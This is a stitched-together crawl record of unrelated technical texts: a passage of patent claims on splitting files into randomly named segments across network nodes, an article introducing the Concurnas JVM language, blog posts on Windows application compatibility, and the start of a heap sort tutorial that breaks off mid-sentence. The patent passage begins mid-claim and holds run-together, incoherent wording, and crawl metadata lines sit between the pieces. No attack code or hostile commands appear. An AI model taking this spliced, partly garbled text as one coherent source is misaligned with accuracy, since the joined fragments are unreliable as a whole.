segments, respectively,generating a segment A filename for the first data segment and a segment B filename for the second data segment, andthe client writing Segment A to node A and Segment B to node B; andafter writing segment A and B, the server saving a map that enables the re-assembly of the file from the first and second data segments. - 2. The method of claim 1, wherein the client writing step occurs over a communication link with each of nodes A and B and independent of the server. - 3. The method of claim 1, further including the client assigning file names for Segments A and B such that no portion or the logical name of the segment files are relatable to a portion of the logical name of the file. - 4. The method of claim 3, wherein the non-relatable file names are generated from a random number. - 5. The method of claim 4, wherein the client is adapted for performing at least one of the steps of receiving the logical names from the server and generating the logical names from a random number. - 6. The method of claim 1, further including the server selecting nodes A and B based on a node-selection algorithm and recommending nodes A and B to the client. - 7. The method of claim 6, wherein the node-selection algorithm selects nodes A and B based on at least one of the following criteria: the level of network traffic at a node, the number of packets errors per transmission to/from a node, the type of storage medium at the node, and the type of communication link between the client node and node. - 8. The method of claim 1, further including the server assigning a node score to each of the nodes A and B and the client selecting A and B based on each of the nodes exceeding a threshold node score reflecting a capability for the node to receive the data compared to other nodes over the network. - 9. The method of claim 1, further including the client erasing the map after the segment A and segment B data is written to nodes A and B, respectively, and wherein the map relates the data in Segment A and Segment B to the relative locations of the data in the file, and the location of the segment A and segment B on the network, such that the map is needed to form the file from the data in the segment A and segment B files. - 10. The method of claim 1, wherein the saving of the map step includes at least one of encrypting the map contents at the server node, and storing the map in a client only, password-protected location at the server node. - 11. The method of claim 1, wherein the map includes the segment A and B filenames, the location of nodes A and B, information identifying the client node, and meta data. - 12. The method of claim 1, wherein the client node is configurable for separate communication links with a plurality of nodes, including at least the server node, and nodes A and B, further comprising the steps of:the client requesting from the server the available nodes for data storage and then receiving from the server the availability of the plurality of nodes,the client segmenting the file into Segments A and B based on the availability of nodes A and B, andthe client writing Segments A and B to the respective nodes A and B, and a copy of the Segment A to a different one of the available plurality of nodes. - 13. The method of claim 12, wherein the client node includes an application resident at the client node, wherein the application requests the file, such that if the segment A is not accessible to the client node, the map directs the client to select the copy of segment A from the different one of the available plurality of nodes, and the application reading the copy of segment A. - 14. A file storing method for storing a file over a network having a plurality of storage devices at network nodes, the file containing real data, comprising the steps of:partitioning the real data into a plurality of real data segments;generating a random filename for each one of the real data segments;associating each of the real data segments with its respective randomly generated filename; andstoring each of the real data segments on one of the plurality of storage devices. - 15. The method of claim 14, wherein the storing step includes storing the metadata needed to reconstruct the file from the data segments at a restricted node on the network, accessible to only the owner of the file. - 16. The method of claim 14, wherein the storing step includes storing the real data segments in an order such that no data segment on a node can provide information about the type of information communicated by the data contained in the file. - 17. The method of claim 14, wherein the real data segments are partitioned from the file according to a sequential order according to their relative byte locations in the file, and the real data segments are stored on one or more of the plurality of nodes one of a random, intermittent or non-sequential order. - 18. The method of claim 14, wherein each of the partitioning, generating, associating and storing steps are carried out by accessing a local filesystem managed by a local operating system. - 19. A computer network, comprisingaa second communication link between the client and the server such that the client is enabled for accessing the information needed to re-assemble the file when the client wishes to re-assemble the file from the data segments. - 20. The computer network of claim 19, wherein the file is associated with source data comprising the plurality of data segments, further including:a plurality of redundant data segments stored at one or more of the plurality of storage spaces, such that no copy of a data segment is located at the same node as the respective data segment. - 21. A method for a computer to access data associated with a user's file, the data being stored as a plurality of data segments distributed over a network having nodes, and as a plurality of copies of the data segments over the nodes, comprising the steps ofthe computer requesting from a network node the locations of the data segments and copies of data segments;the computer accessing a node in order to retrieve a data segment;if the node is inaccessible, accessing a different node where a copy of the segment is stored; andrepeating the accessing the copy of the segment at a different node step until a copy of the segment is accessible to the computer. - 22. Server software residing on a storage medium, comprisinga fourth portion for limiting access to the map file to only the owner of the source file. - 23. The server software of claim 22, further comprising a server part and a client part, the server part comprising the first, second, third, fourth and fifth portions, andthe client portion being downloadable over a network by a node designated as a client node, andeach of the server and client parts being adapted to run as applications through an interface provided by a local operating system. - 24. Client software residing on a storage medium, comprisinga fifth portion for gaining access to a map file on a network node, the map file containing the communicated relationship between the filenames and the nodes where the data portions reside, and the relationship between the data portions and the data in the source file. - 25. The client software of claim 24, wherein the fourth portion includes a client password and node identification information for gaining access to the map file, and the fourth portion includes a component for removing the information residing in the map file after all data portions have been successfully written and the relationships communicated to another computer.
https://patents.google.com/patent/US20090222509A1/en
CC-MAIN-2018-26
refinedweb
13,462
55.58
Introducing new JVM language Concurnas It’s not every day that a new JVM language is born unto the world, so to celebrate the arrival of Concurnas here’s a complete introduction to the programming language by creator Jason Tatton. Concurnas has modern syntax and features, is open source and has GPU computing built in, which opens up the possibility for machine learning applications. Let’s see what Concurnas can do! What is Concurnas and what sets it apart?. Utilizing Concurnas to build software enables developers to easily and reliably realize the full computing power offered by today’s multi-core computers, allowing them to write better software and be more productive. In this article we’re going to have a look at some of the key features of Concurnas that make it unique by building the key components of a trading application for use in a finance company. The major goals of Concurnas Concurnas has been created with five major goals in mind: - To offer the syntax of a dynamically typed language with the type safety and performance of a strongly typed compiled language. With optional types and an optional degree of conciseness with compile time error checking. - To make concurrent programming easier, by presenting a programming model which is more intuitive to non-software engineers than the traditional thread and lock model. - To allow both researchers and practitioners alike to be productive such that an idea can be taken from idealization all the way through to production using the same language and the same code. - Incorporate and support modern trends in software engineering including null safety, traits, pattern matching and first class citizen support for dependency injection, distributed computing and GPU computing. - To facilitate future programming language development by supporting the implementation of Domain Specific Languages and by enabling other languages to embedded within Concurnas code. Introduction to Concurnas Basic syntax Let us first start off with some basic syntax. Concurnas is a type inferred language, with optional types: myInt = 99 myDouble double = 99.9 //here we choose to be explicit about the type of myDouble myString = "hello " + " world!"//inferred as a String val cannotReassign = 3.2f cannotReassign = 7.6 //not ok, compilation error anArray = [1 2 3 4 5 6 7 8 9 10] aList = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] aMatrix = [1 2 3 ; 4 5 6 ; 7 8 9] Importing code By virtue of the fact that Concurnas runs upon the JVM and is Java compatible we are afforded access to the existing large pool of libraries available for Java, the JDK and of course any software which the enterprise in which we are operating has already created in any JVM language (such as Scala, Kotlin etc). We can import code via familiar mechanisms: from java.util import List import java.util.Set Functions Let us now introduce functions. Concurnas is an optionally concise language, meaning that the same function may be implemented to a differing degree of verbosity to suit the target audience reading the code. As such the following three implementations are functionally identical: def plus(a int, b int) int{//the most verbose form return a + b } def plus(a int, b int) {//return type inferred as int a + b//implicit return } def plus(a int, b int) => a + b //=> may be used where the function body consists of one line of code Here is a simple function we will use later on in this article: def print(fmtString String, args Object...){//args is a vararg System.out.println(String.format(fmtString, args)) } Parameters to functions in Concurnas may be declared as vararg parameters, that is to say a variable number of arguments may be passed to them. Hence the following invocations of our print("hello world!") //prints: hello world! print("hello world! %s %s %s", 1, 2, 3) //prints: hello world! 1 2 3 Concurrency model Where Concurnas really stands out is in its Concurrency model. Concurnas does not expose threads to the programmer, rather, it has thread-like ‘isolates’ which are isolated units of code that, at runtime, are executed concurrently by being multiplexed onto the underlying hardware of the machine(s) upon which Concurnas is running. When creating isolates, we are constrained only by the amount of memory the machine we are operating upon has. We can create an isolate by appending a block of code or function invocation with the bang operator: !: m1 String: = {"hello "}!//isolate with explicit returned type String: m2 = {"world!"}!//spawned isolate with implicit returned type String: msg = m1 + m2 print(msg) //outputs: hello world! Above, msg will only be calculated when the isolates creating m1 and m2 have finished concurrent execution and have written their resulting values to their respective variables. Isolates do not permit sharing of state between each other than through special types called ‘refs’. A ref is simply a normal type appended with a colon: :. For instance, above we have seen the spawned isolates returning values of type String:. Refs may be updated concurrently by different refs on a non-deterministic basis. SEE ALSO: How To Securely Program in Java in 2020 Refs possess a special feature in that they can be watched for changes, we can then write code to react to those changes, this is achieved in Concurnas via the onchange and every statements. onchange and every statements may return values, these values are themselves refs since onchange and every statements operate within their own dedicated isolates: a int: = 10 b int: = 10 //^two refs oc1 := onchange(a, b){ plus(a, b) } ev1 := every(a, b){ plus(a, b) } oc2 <- plus(a, b)//shorthand for onchange ev2 <= plus(a, b)//shorthand for every //... other code a = 50//we change the value of a await(ev2;ev2 == 60)//wait for ev2 to be reactively set to 60 //carry on with execution... onchange statements will execute the code defined within their blocks when any one of the watched refs are changed. every statements operate in the same way but will trigger their code for execution on every update to a watched ref, including the initial value. Thus, when ref a is updated above, variables oc1, ev1, oc2 and ev2 will be updated with the sum of a and b, with ev1 and ev2 having previously held the initial sum of a and b. Building an application Now that we have the basics in order, let’s start to put them together in an application. Let’s say we’re working on financial trading systems in a typical investment bank or hedge fund. We want to quickly put together a reactive system to take ticking timestamped asset prices from a marketplace, and when the price satisfies certain criteria, perform an action. The most natural way to architect a system like this is as a reactive system which will utilize some of the special concurrency related features of the language. Create a function First we create a function to output some repeatability consistent pseudo random timeseries data that we can use for development and testing: from java.util import Random from java.time import LocalDateTime class TSPoint(-dateTime LocalDateTime, -price double){ //class with two fields having implicit getter functions automatically defined by prefixing them with - override toString() => String.format("TSPoint(%S, %.2f)", dateTime, price) } def createData(seed = 1337){//seed is an optional parameter with a default value rnd = new Random(seed) startTime = LocalDateTime.\of(2020, 1, 1, 0, 0)//midnight 1st jan 2020 price = 100. def rnd2dp(x double) => Math.round(x*100)/100. //nested function ret = list() for(sOffset in 0 to 60*60*24){//'x to y' - an integer range from 'x' to 'y' time = startTime.plusSeconds(sOffset) ret.add(TSPoint(time, price)) price += rnd2dp(rnd.nextGaussian()*0.01) } ret } Above we see that we first define a class TSPoint, the instance objects of which are used to represent the individual points of the timeseries associated with our tradeable asset. Let’s check that our function outputs a sensible range of test data: timeseries = createData()//call our function with default random seed prices = t.price for t in timeseries//list comprehension min = max Double? = null//max and max may be null for(price in prices){ if(min == null or price < min){ min = price }elif(max == null or price > max){ max = price } } print("min: %.2f max: %.2f", min, max) //outputs: min: 96.80 max: 101.81 When calling our function with the default random seed we can see that it outputs a reasonable intra-day range of data: "min: 96.80 max: 101.81". Nullable types Now is a great time for us to introduce the support that Concurnas has for nullable types. As in keeping with modern trends in programming languages, Concurnas (like Kotlin and Swift) is a null safe language, that is to say, if a variable has the capacity for being null, it must be explicitly declared as such, otherwise it is assumed to be non null. It is not possible to assign a null value to a non null type, rather the type must be explicitly declared as being nullable by appending it with a question mark, ?: aString String aString = null //this is a compile time error, aString cannot be null nullable String? nullable = null //this is ok len = nullable.length()//this is a compile time error as nullable might be null We see above that the call to nullable.length() results in a compile time error as nullable might be null which would cause the function invocation of length() to throw the dreaded NullPointerException. To our aid however, Concurnas offers a number of operators which make working with variables of a nullable type like our nullable variable safer. They are as follows: len1 Integer? = nullable?.length() //1. the safe call dot operator len2 int = (nullable?: "oops").length() //2. the elvis operator len3 int = nullable??.length() //3. the non null assertion operator These operators behave as follows: - The safe call dot operator will return null (and therefore a nullable type) if the left hand side of the dot is a nullable type resolving to null. - The elvis operator is similar to the safe call operator except that when the left hand side is null, the specified value on the right hand side of the operator is returned instead of null ( "oops"in our example above). - The non null assertion operator disables the null protections and will simply throw an exception if its left hand side resolves to null. Concurnas is also able to infer the scope of nullability for nullable types. For areas where we have asserted a nullable variable as being not null (for instance, in a branching if statement), we are able to use the variable as if it were not nullable: def returnsNullable() String? => null nullabeVar String? = returnsNullable() len int = if( nullabeVar <> null ){ nullabeVar.length()//ok because nullabeVar cannot be null here! }else{ -1 } print(len)//prints: -1 Together this support for nullable types helps us write more reliable, safer programs. Trigger a trading operation We shall now continue to build our trading system, we want to trigger a trading operation as soon as the tracked asset reaches a certain price. We can use an onchange block to trigger this process when the price of the asset is above 101.71: lastTick TSPoint://our asset timeseries onchange(lastTick){ if(lastTick.price > 101.71){ //perform trade here... return } } Notice above the use of return within the onchange block, this ensures that when the trading condition is met, the associated trading operation is performed only once and after this the onchange block terminates. Without the return statement the onchange block would trigger whenever the trading condition is met until the lastTick is out of scope. Creating a ref We can easily perform other interesting things along the lines of the previous pattern, for instance, we can create a ref, lowhigh of the rolling high/low prices for the day as follows: lowhigh (TSPoint, TSPoint)://lowhigh is a tuple type onchange(lastTick){ if(not lowhigh:isSet()){//using : allows us to call methods on refs themselves lowhigh = (lastTick, lastTick) } else{ (prevlow, prevHigh) = lowhigh//tuple decomposition if(lastTick.price < prevlow.price){ lowhigh = (lastTick, prevHigh) }elif(lastTick.price > prevHigh.price){ lowhigh = (prevlow, lastTick) } } } Build an object-oriented system Now that we have the dealing and informational components of our trading system prepared we are ready to build an object oriented system using them. To do this we are going to take advantage of the support built into Concurnas for Dependency Injection (DI). DI is a modern software engineering technique the use of which makes reasoning, testing and re-using object oriented software components easier. In Concurnas, first class citizenship support is provided for DI in the form of object providers, these are responsible for creating the graph of, and injecting dependencies into, provided instances of classes. Usage is optional but pays dividends for large projects: trait OrderManager{ def doTrade(onTick TSPoint) void } trait InfoFeed{ def display(lowhigh (TSPoint, TSPoint):) } inject class TradingSystem(ordManager OrderManager, infoFeed InfoFeed){ //'classes' marked as inject may have their dependencies injected def watch(){ tickStream TSPoint: lowhigh (TSPoint, TSPoint): onchange(tickStream){ if(not lowhigh:isSet()){ lowhigh = (tickStream, tickStream) } else{ (prevlow, prevHigh) = lowhigh if(tickStream.price < prevlow.price){ lowhigh = (tickStream, prevHigh) }elif(tickStream.price > prevHigh.price){ lowhigh = (prevlow, tickStream) } } } infoFeed.display(lowhigh:)//appending : indicates pass-by-ref semantics onchange(tickStream){ if(tickStream.price > 101.71){ ordManager.doTrade(tickStream) return } } tickStream: } } actor TestOrderManager ~ OrderManager{ result TSPoint: def doTrade(onTick TSPoint) void { result = onTick } def assertResult(expected String){ assert result.toString() == expected } } actor TestInfoFeed ~ InfoFeed{ result (TSPoint, TSPoint): def display(lowhigh (TSPoint, TSPoint):) void{ result := lowhigh//:= assigns the ref itself instead of the refs value } def assertResult(expected String){ await(result ; (""+result) == expected) } } provider TSProviderTests{//this object provider performs dependency injection into instance objects of type `TradingSystem` provide TradingSystem single provide OrderManager => TestOrderManager() single provide InfoFeed => TestInfoFeed() } //create our provider and create a TradingSystem instance: tsProvi = new TSProviderTests() ts = tsProvi.TradingSystem() //Populate the tickStream with our test data tickStream := ts.watch() for(tick in createData()){ tickStream = tick } //extract tests and check results are as expected... testOrdMng = tsProvi.OrderManager() as TestOrderManager testInfoFeed = tsProvi.InfoFeed() as TestInfoFeed //validation: testOrdMng.assertResult("TSPoint(2020-01-01T04:06:18, 101.71)") testInfoFeed.assertResult("(TSPoint(2020-01-01T19:59:10, 96.80), TSPoint(2020-01-01T10:10:05, 101.81))") print('All tests passed!') The above introduces another two interesting features of Concurnas, traits and actors. Traits in Concurnas are inspired by traits in Scala, here however we are simply using them like interfaces (as seen in languages such as Java) in that they specify methods which concrete implementing classes must provide. Actors in Concurnas are special classes the instance objects of which may be shared between different isolates, as actors have their own concurrency control so as to avoid non deterministic changes to their internal state by multiple isolates interacting with them concurrently. SEE ALSO: What to look for in an OpenJDK Distro Building a reactive system such as the above from scratch with traditional programming languages would of course be a long winded affair. As can be seen above with Concurnas this is a straightforward operation. Domain Specific Languages (DSLs) Another nice feature of Concurnas is its support for Domain Specific Languages (DSLs). Expression lists are one feature which makes implementing DSLs easy. Expression lists essentially enable us to skip writing dots and parenthesis around method invocations. This leads to a more natural way of expressing algorithms. We can use this in our example trading system. The following is perfectly valid Concurnas code: order = buy 10e6 when GT 101.71 This is enabled by creating our order API as follows: enum BuySell{BUY, SELL} def buy(amount double) => Order(BuySell.BUY, amount) def sell(amount double) => Order(BuySell.SELL, amount) open class Trigger(price double) class GT(price double) < Trigger(price) class LT(price double) < Trigger(price) class Order(direction BuySell, amount Double){ trg Trigger? def when(trg Trigger) => this.trg = trg; this } order = buy 10e6 when GT 101.71 Additionally, though not covered here, Concurnas supports operator overloading and extension functions. GPU computing support Now let us briefly look at the support built into Concurnas for GPU computing. GPUs can be thought of as massively data parallel computation devices that are ideally suited for performing math oriented operations on a large datasets. Whereas today a typical high end CPU (e.g. AMD Ryzen Threadripper 3990X) may have up to 64 cores – affording us up to 64 instances of concurrent computation, a comparable GPU (e.g. NVIDIA Titan RTX) has 4608! All graphics cards in modern computers have a GPU, effectively we all have access to a supercomputer. It is common for algorithms implemented on the GPU to be up to 100x faster (or more!) than their CPU implementations. Furthermore, the relative cost of this computation when performed on a GPU from a hardware and power perspective is far lower than its CPU counterpart. There is however a catch… GPU algorithms have a relatively esoteric implementation and the nuances of the underlying GPU hardware must be understood in order to obtain optimal performance. Traditionally, knowledge of C/C++ has been a requirement. With Concurnas things are different. Concurnas has first class citizen support for GPU computing, meaning that support is built directly into the language itself to enable developers to leverage the power of GPU’s. Thus we can write idiomatic Concurnas code and have syntactic and semantic checks performed at compile time in one step, greatly simplifying our build process and eliminating the need for us to learn C/C++ or rely upon runtime checks of our code. GPU algorithms are implemented in entry points known as a gpukernel. Let’s look at a simple algorithm for matrix multiplication (a core component of linear algebra which is heavily used in Machine Learning and finance): gpukernel 2 matMult(wA int, wB int, global in matA float[2], global in matB float[2], global out result float[2]) { globalRow = get_global_id(0) // Row ID globalCol = get_global_id(1) // Col ID rescell = 0f; for (k = 0; k < wA; ++k) {//matrices are flattened to vectors on the gpu... rescell += matA[globalCol * wA + k] * matB[k * wB + globalRow]; } // Write element to output matrix result[globalCol * wA + globalRow] = rescell; } This GPU kernel presents a succinct but naive implementation. The code can be optimized to improve performance significantly, for instance, through the use of local memory. For now though this is good enough. We can compare this to our traditional CPU based matrix multiplication algorithm as follows: def matMultCPU(A float[2], B float[2]) { n = A[0].length m = A.length p = B[0].length result = new float[m][p] for(i = 0;i < m;i++){ for(j = 0;j < p;j++){ for(k = 0;k < n;k++){ result[i][j] += A[i][k] * B[k][j] } } } result } The core matrix multiplication algorithm is the same across the GPU and CPU implementations. However, there are some differences: the GPU kernel itself is executed in parallel on our GPU with the only distinction in those individual parallel executions being the values returned from the get_global_id calls – these are used to identify which data of the data set the instance should be targeting. Additionally, return values need to be passed into GPU kernels. Now that we have created our GPU kernel we are able to execute it on the GPU. This is more involved than standard CPU based computation in that we are setting up an asynchronous pipeline of data copying to the GPU, kernel execution, results copying from the GPU and finally cleanup. Luckily Concurnas leverages the ref model of concurrency in order to streamline this process which serves well in also letting us: keep our GPU busy (thus maximizing throughput), use multiple GPUs concurrently and do other CPU based work at the same time as GPU execution: def compareMulti(){ //we wish to perform the following on the GPU: matA * matB //matA and matB are both matrices of type float matA = [1f 2 3 ; 4f 5 6; 7f 8 9] matB = [2f 6 6; 3f 5 2; 7f 4 3] //use the first gpu available gps = gpus.GPU() deviceGrp = gps.getGPUDevices()[0] device = deviceGrp.devices[0] //allocate memory on gpu inGPU1 = device.makeOffHeapArrayIn(float[2].class, 3, 3) inGPU2 = device.makeOffHeapArrayIn(float[2].class, 3, 3) result = device.makeOffHeapArrayOut(float[2].class, 3, 3) //asynchronously copy input matrix from RAM to GPU c1 := inGPU1.writeToBuffer(matA) c2 := inGPU2.writeToBuffer(matB) //create an executable kernel reference: inst inst = matMult(3, 3, inGPU1, inGPU2, result) //asynchronously execute with 3*3 => 9 'threads' //if c1 and c2 have not already completed, wait for them compute := device.exe(inst, [3 3], c1, c2) //copy result matrix from GPU to RAM //if compute has not already completed, wait for it ret = result.readFromBuffer(compute) //cleanup del inGPU1, inGPU2, result del c1, c2, compute del deviceGrp, device del inst //print the result print('result via GPU: ' + ret) print('result via CPU: ' + matMultCPU(matA, matB)) //prints: //result via GPU: [29.0 28.0 19.0 ; 65.0 73.0 52.0 ; 101.0 118.0 85.0] //result via CPU: [29.0 28.0 19.0 ; 65.0 73.0 52.0 ; 101.0 118.0 85.0] } Closing thoughts This concludes our article for now. We’ve looked at many of the aspects of Concurnas which make it unique though there are many more features of interest to the modern programmer such as first class citizen support for distributed computing, temporal computing, vectorization, language extensions, off heap memory management, lambdas and pattern matching to name a few. Check out the Concurnas website or dive straight into the GitHub repo.
https://jaxenter.com/introducing-new-jvm-lanaguage-concurnas-167915.html
CC-MAIN-2021-39
refinedweb
3,614
51.48
Tips on Windows Application Compatibility I know I could talk all day about application compatibility topics and not cover everything that can be discussed. Here’s a one hour webcast I did that focuses on the top issues and most confusing topics for Application Compatibility. I do some of my favorite demos showing UAC architecture, data redirection, services isolation, and mandatory integrity control. The target audience is for developers and testers. Here’s the webcast: Developing Compatible Applications for Windows 7 My main goal in this presentation is to talk about moving application from XP or Vista to Windows 7 and demystify some of common problems. I also wanted to “plug” the Application Compatibility Cookbooks. These documents are some of the best resources for understanding what breaking changes have occurred and how to mitigate them. Make sure to reference both cookbooks. Most of the breaking changes are in the original XP to Vista cookbook. Moving from XP-> Vista/2008 –> Win7: “Application Compatibility Cookbook” Moving from Vista -> Win 7: “Windows 7 Application Quality Cookbook” I haven't posted in a while. I've been helping out with a couple other programs we have going on in the labs these days. OEM Ready is a subset of Certified for Windows Vista targeted at applications that ship on new PC's. If you are using the automation in the OEM Ready Certification Test Tool, you can get a false failure if your application has a UTF-8 embedded manifest that has the byte order mark (BOM) included. Visual Studio 2008 includes the BOM if you use it to embed the manifest. The error in the log looks something like this: Sigcheck is used by the test tool to dump the manifest. Sigcheck outputs the BOM as garbage characters (). This throws off the test tool and it gives an incorrect result. This is a known bug with the tools and will be fixed. For now, if you run into this problem, you can submit this test case as a pass. Pat add the roles and features that that are needed. So, from an application compatibility point of view, your application may require a role that isn't installed by default. There are two ways to programmatically query what roles and features are installed. Using ServerManagerCmd There's a cool command line utility that has been added to Window Server 2008 called ServerManagerCmd. ServerManagerCmd allows you to add, remove, and query roles and features. If you execute the following command: > servermanagercmd.exe -query roles.xml > servermanagercmd.exe -query roles.xml An XML file of all the roles and features installed will be created. You could then parse that file to determine what roles and features are installed. I was hoping to find something in the scripting repository to do this but couldn't find anything. Powershell would be a good option but remember... no features are installed by default. Powershell and .NET 3.0 would need to be installed. You could do that with servermanagercmd as well. For example: > servermanagercmd.exe -install Powershell > servermanagercmd.exe -install Powershell ServerManagerCmd is great for scripting but what if you want to do determine installed roles in your application's installer? ...or avoid lots of parsing in a script? ..or needing to install .NET and Powershell? WMI is probably a better choice. With Windows Server 2008, there is a new class in the WMI namespace \Root\cimv2 called Win32_ServerFeature. This will allow you to use WMI to iterate through what roles and features are installed. WMI is a very good option for determining in your installer if a prerequisite role is installed. this blog. The first thing to mention is the Application Compatibility Cookbook. This is the primer of Application Compatibility. I was going to call it the K&R of of Application Compatibility but I don't want to date myself ;-). I highly recommend reading the cookbook or at least keep it handy for a reference. Now that you've looked at the cookbook (Go look at it now if you haven't), you are probably saying, "Whew, that's a lot of stuff. Can you just tell me the top issues with Application Compatibility?" So, let's start with a list of the top areas of issues: User Account Control (UAC): UAC is intended to run applications as standard user by default. Even if you are a member of the administrators group, applications that are not marked to run with administrator privileges will run with reduced "standard user" rights. Applications may not be designed to run as a standard user and may not have rights or privileges to certain resources. Next steps if you have an issue: Installation Installation issues usually revolve around UAC. Almost all installers need to run with admin rights because they usually write to Program Files or HKLM in the registry. MSI issues usually revolve around custom actions being run in the wrong context (user or admin). Service Isolation On Vista and Windows Server 2008, only services run in session 0. Desktop applications run in sessions 1+n. This blocks Windows messages between services and desktop apps. This also blocks services from displaying UI on the desktop. Next steps if you have and issue: Internet Explorer Protected Mode IE in protected mode is sometimes called "Low Rights IE". When protected mode is on, IE runs at a low integrity level. This isolates IE from the rest of the processes and resources on the system. ActiveX controls and browser objects may not have appropriate rights running in protected mode. That's it for now. One final note, the area for all things regarding Application Compatibility can be found on Technet. I'm Pat Altimore an Application Developer Consultant who spends most of my time working in the Application Compatibility Labs at Microsoft. I'm planning on posting stuff of interest that we find in the lab. I hope the posts here will be helpful to developers that are getting their apps ready for Vista or Windows Server 2008 (and beyond). There are a lot of great blogs by other AppCompat consultants out there. Please check out: MaartenB, CJacks, and Aaron_Margosis.
http://blogs.msdn.com/patricka/
crawl-002
refinedweb
1,027
57.16
in this article, we’ll learn how to use Azure Blob storage in ASP.NET web forms and how to upload an image file to Blob storage from code behind. Before reading this article, please go through the following article: In this article, I’ll tell you. Step 2: Go to Templates, Visual C#, then ASP.NET Web Application. Step 3: In the name section, give a name to project. Here I have given the name “Azure Blob Storage”. Step 4: Click on “OK” button to create a project. In the following figure, choose "Empty" project. Click “OK” button. We can see, in our project, there are three types of categories items, properties, References, and Web.config. Now we need to install the Windows Azure Storage package for using Azure Storage Access and all supported classes. Now go to the “TOOLS” menu, select “NuGet Package Manager”, and select “Manage NuGet Packages for Solution”. In the following figure go to the search box and type “azure”. After this you will find the “Windows Azure Storage”, click on “Install” button. Now in the following figure, you can see the installation of the “Windows Azure Storage”. Here in the following window,you will be asked to install “Windows Azure Storage” for the current project, so here we want to install the packages for current project. Simply click on “OK” button. The installing process is going on. Here in the following figure, click on “I Accept” button. Now we successfully installed the “Windows Azure Storage” (in the small red circle). Click on “Close” button. Here we also need to install the azure storage client packages. So go to the search box, type the “Azure Storage Client”. After typing, click on “Install” button. We successfully installed the “Azure Storage Client” package also. Go to your project, here my project name is “Azure Blob Storage”. Right click on to project, select “Add” and select “New Item”. Here, I am going to create a Web Form, so select a Web Form in the list and give the name to your Web Form; here I gave the name “MyForm” to my Web Form, you can give any name to your Web Form. Click on “Add” button. After creating a form, you can see your project, where form will be created successfully with the name “MyForm.aspx” In the “MyForm.aspx.cs” page, let me do some changes. In the “MyForm.aspx.cs” page, I have added all namespaces which is minimum required. Now we need “accountname” and “accesskey” to get connected with Azure Account, so go to Azure portal. Go to “Storage” option where I have created a Storage Account with the name “nitindemostorage” in my previous article. You can visit my previous article of azure. Here, after clicking “nitindemostroage” named Storage Account, go to bottom of the window and select “Manage Access Keys”. You will find the following window, copy the “Storage Account Name” and “Primary Access Key” from here, Go back in your project and make some changes over there. In the “accountname” and “accesskey” paste the copied item over there. And make some other code over there for getting connections with Azure storage account with “CloudStorageAccount” class object and at last convert your image into stream upload as in the following image: Code One more thing, here we need to create a Web App Profile for publishing our app into the cloud. Simply go to “WEB APPS” in your Azure Portal and click on “New” to add a new Web App. After clicking on “New”, you will see the following window. Go to “COMPUTE” option, select “WEB APP”, and select “QUICK CREATE". In the URL section, you can write your Web App name. Here I have given “nitinblobstoragedemo”, if the entered name is correct it will create a check sign (in blue color). In the “APP SERVICE PLAN” click on “Default1 (East Asia, Shared)”. Click on “CREATE WEB APP”. We have created our Web App successfully. After doing this, we can see our created Web APP(“nitinblobstoragedemo”). And it is in running mode. We make some code in the Web Config file also. Here in the <add value=”MyForm.aspx”/>, “My Form” is my Web form. In the “My two ways. Here, I am going to discuss both ways. Firstly, right click on your project. Here my project is “AzureBlobStorage”, so select the “Publish” option. In the following figure, you can see “nitinblobstoragedemo” is my Web App name, which we have created in the starting. Select your Web APP profile and click "Publish” button. After clicking on “publish” button the project would publish on cloud as well as in your Azure Explorer. The second way to publish your project is to go for cloud. You can download your profile from the Azure account in your Web Apps. For this click on your Web App profile, in the Publish your app section, click on “Download the publish profile”. After clicking, your profile will be downloaded in your system. After this, now we can see the status of our publishing. So my “nitinblobstoragedemo” app service published successfully. Now build your project and get your output. Now run the application, press F5. So, finally we got our output. We can see the changes of this in our Azure Explorer. Now refresh the Azure Explorer to check your image. “Sampleblob.jpg” is my image which is generated by programming, Right click on image and open it and if you want to get that images by code on your view, you can see in my next article. So, wait for that and stay tuned. It can take few moments to download the image is in progress. Here's the final output and you can see my image: Thanks for reading this article and wait for next, Connect(“Nitin Pandit”); View All
https://www.c-sharpcorner.com/UploadFile/8ef97c/upload-image-to-azure-blob-storage-in-Asp-Net-part-2/
CC-MAIN-2019-30
refinedweb
971
75.81
Heap Sort is a popular and efficient sorting algorithm in computer programming. Learning how to write the heap sort algorithm requires knowledge of two types of data structures - arrays and trees. The initial set of numbers that we want to sort is stored in an array e.g. [10, 3, 76, 34, 23, 32] and after sorting, we get a sorted array [3,10,23,32,34,76] Heap sort works by visualizing the elements of the array as a special kind of complete binary tree called heap. What is a complete Binary Tree? Binary Tree A binary tree is a tree data structure in which each parent node can have at most two children In the above image, each element has at most two children. Full Binary Tree A full Binary tree is a special type of binary tree in which every parent node has either two or no children. Complete binary tree A complete binary tree is just like a full binary tree, but with two major differences - Every level must be completely filled - All the leaf elements must lean towards the left. - The last leaf element might not have a right sibling i.e. a complete binary tree doesn’t have to be a full binary tree. How to create a complete binary tree from an unsorted list (array)? - Select first element of the list to be the root node. (First level - 1 element) - Put the second element as a left child of the root node and the third element as a right child. (Second level - 2 elements) - Put next two elements as children of left node of second level. Again, put the next two elements as children of right node of second level (3rd level - 4 elements). - Keep repeating till you reach the last element. Relationship between array indexes and tree elements Complete binary tree has an interesting property that we can use to find the children and parents of any node. If the index of any element in the array is i, the element in the index 2i+1 will become the left child and element in 2i+2 index will become the right child. Also, the parent of any element at index i is given by the lower bound of (i-1)/2. Let’s test it out, Left child of 1 (index 0) = element in (2*0+1) index = element in 1 index = 12 Right child of 1 = element in (2*0+2) index = element in 2 index = 9 Similarly, Left child of 12 (index 1) = element in (2*1+1) index = element in 3 index = 5 Right child of 12 = element in (2*1+2) index = element in 4 index = 6 Let us also confirm that the rules holds for finding parent of any node Parent of 9 (position 2) = (2-1)/2 = ½ = 0.5 ~ 0 index = 1 Parent of 12 (position 1) = (1-1)/2 = 0 index = 1 Understanding this mapping of array indexes to tree positions is critical to understanding how the Heap Data Structure works and how it is used to implement Heap Sort. What is Heap Data Structure ? Heap is a special tree-based data structure. A binary tree is said to follow a heap data structure if - it is a complete binary tree - All nodes in the tree follow the property that they are greater than their children i.e. the largest element is at the root and both its children and smaller than the root and so on. Such a heap is called a max-heap. If instead all nodes are smaller than their children, it is called a min-heap Following example diagram shows Max-Heap and Min-Heap. How to “heapify” a tree Starting from a complete binary tree, we can modify it to become a Max-Heap by running a function called heapify on all the non-leaf elements of the heap. Since heapfiy uses recursion, it can be difficult to grasp. So let’s first think about how you would heapify a tree with just three elements. heapify(array) Root = array[0] Largest = largest( array[0] , array [2*0 + 1]. array[2*0+2]) if(Root != Largest) Swap(Root, Largest) The example above 